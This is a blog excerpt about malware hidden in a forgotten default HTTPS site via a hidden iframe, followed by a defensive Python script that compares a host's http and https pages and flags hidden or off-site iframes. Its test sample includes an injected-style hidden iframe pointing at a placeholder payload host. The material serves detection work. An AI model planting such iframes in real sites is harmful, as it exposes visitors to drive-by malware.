Hiding an infection in an unused SSL site

From StopBadware blog:

Today we saw an interesting case where no one could find badware in a website that Google reported as infected—until Google tipped us off to check the site using https (i.e., instead of testing http://example.com, we tested https://example.com). Sure enough, when we used https, an apparently unused default site loaded, along with a hidden iframe that connected to a Chinese server and downloaded a malicious payload. In addition to being difficult to track down, my colleague Oliver points out that intrusion detection systems, network firewalls, and other devices that scan traffic as it passes through a network would probably miss this malicious payload because of it being encrypted within an SSL stream.
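The lesson for anyone auditing a site is that the http and https versions of a hostname can serve entirely different content (here, a forgotten default SSL site), so a scan that only fetches one scheme can miss the infection. The following script is an added example and not code from the StopBadware post: it fetches the same hostname over both schemes, extracts every iframe, and flags those that are hidden (display:none or 0/1-pixel dimensions) or point off-site. The sample pages and the hostnames in them are constructed for the example; `payload-host.invalid` is a placeholder, not a real indicator.

```python
"""Compare a host over http and https and flag hidden or off-site iframes.

Added example, not from the StopBadware post.  Sample HTML below is
constructed; hostnames in it are placeholders.
"""
import ssl
import urllib.request
from html.parser import HTMLParser
from urllib.parse import urlparse


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag in a document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":  # HTMLParser lowercases tag names
            self.iframes.append(dict(attrs))


def _tiny(value):
    """True for dimensions of 0 or 1 (e.g. '0', '1', '1px'); '100%' is not tiny."""
    digits = "".join(ch for ch in (value or "") if ch.isdigit())
    return digits != "" and int(digits) <= 1


def is_hidden(attrs):
    """Heuristic: hidden via CSS or collapsed to a 0/1-pixel box."""
    style = (attrs.get("style") or "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    return _tiny(attrs.get("width")) and _tiny(attrs.get("height"))


def suspicious_iframes(html, page_host):
    """Return [(src, [reasons])] for iframes that are hidden or load from another host."""
    parser = IframeCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.iframes:
        src = attrs.get("src") or ""
        src_host = urlparse(src).hostname
        reasons = []
        if is_hidden(attrs):
            reasons.append("hidden")
        if src_host and src_host.lower() != page_host.lower():
            reasons.append("off-site:" + src_host)
        if reasons:
            findings.append((src, reasons))
    return findings


def compare_schemes(pages, host):
    """pages maps scheme -> HTML; returns scheme -> findings so differences stand out."""
    return {scheme: suspicious_iframes(html, host) for scheme, html in pages.items()}


def fetch_both(host, timeout=10):
    """Fetch '/' from the same hostname over http and https (network; not used offline)."""
    pages = {}
    ctx = ssl.create_default_context()
    for scheme in ("http", "https"):
        try:
            with urllib.request.urlopen(f"{scheme}://{host}/", timeout=timeout,
                                        context=ctx if scheme == "https" else None) as resp:
                pages[scheme] = resp.read().decode("utf-8", "replace")
        except Exception:
            pages[scheme] = ""  # unreachable scheme: nothing to inspect
    return pages


# Constructed samples: the http site is the real one, the https default site carries
# a hidden iframe to a placeholder host (mirrors the case described in the post).
HTTP_SAMPLE = ("<html><body><h1>Example Co</h1>"
               "<iframe src='https://www.example.com/widget' width='300' height='200'>"
               "</iframe></body></html>")
HTTPS_SAMPLE = ("<html><body><h1>It works!</h1>"
                "<iframe src='http://payload-host.invalid/x.php' width='0' height='0' "
                "style='display:none'></iframe></body></html>")

if __name__ == "__main__":
    # Offline run against the constructed pages; swap in fetch_both(host) for a live check.
    for scheme, found in compare_schemes({"http": HTTP_SAMPLE, "https": HTTPS_SAMPLE},
                                         "www.example.com").items():
        print(scheme, found)
```

Running `compare_schemes` side by side is the point: a clean http result next to a flagged https result is exactly the pattern the post describes. Because the payload travels inside TLS, this kind of host-side or endpoint-side inspection is what catches it; a network sensor seeing only ciphertext cannot.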
